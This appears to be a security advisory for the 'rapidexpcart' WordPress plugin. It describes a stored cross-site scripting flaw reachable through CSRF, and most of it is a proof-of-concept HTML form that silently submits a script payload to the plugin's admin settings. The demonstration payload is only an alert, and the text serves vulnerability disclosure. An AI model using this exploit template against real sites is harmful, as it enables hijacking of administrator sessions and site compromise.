The plugin does not sanitize and escape the url parameter in the rapidexpcart endpoint before storing it and outputting it back in the page, leading to a Stored Cross-Site Scripting vulnerability which could be used against high-privilege users such as admin, furthermore lack of csrf protection means an attacker can trick a logged in admin to perform the attack by submitting a hidden form.
1. Save the following as .html file and open it in the browser where Administrator is logged in.
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://172.28.128.6/wordpress/wp-admin/options-general.php?page=rapidexpcart%2Frapidexpcart.php" method="POST">
<input type="hidden" name="_action" value="save" />
<input type="hidden" name="url" value="<script>alert(document.domain)</script>" />
<input type="hidden" name="key[]" value="product" />
<input type="hidden" name="name[]" value="商品" />
<input type="hidden" name="order[]" value="1" />
<input type="hidden" name="key[]" value="cart" />
<input type="hidden" name="name[]" value="カート" />
<input type="hidden" name="order[]" value="2" />
<input type="hidden" name="key[]" value="event" />
<input type="hidden" name="name[]" value="" />
<input type="hidden" name="order[]" value="3" />
<input type="hidden" name="key[]" value="download" />
<input type="hidden" name="name[]" value="" />
<input type="hidden" name="order[]" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```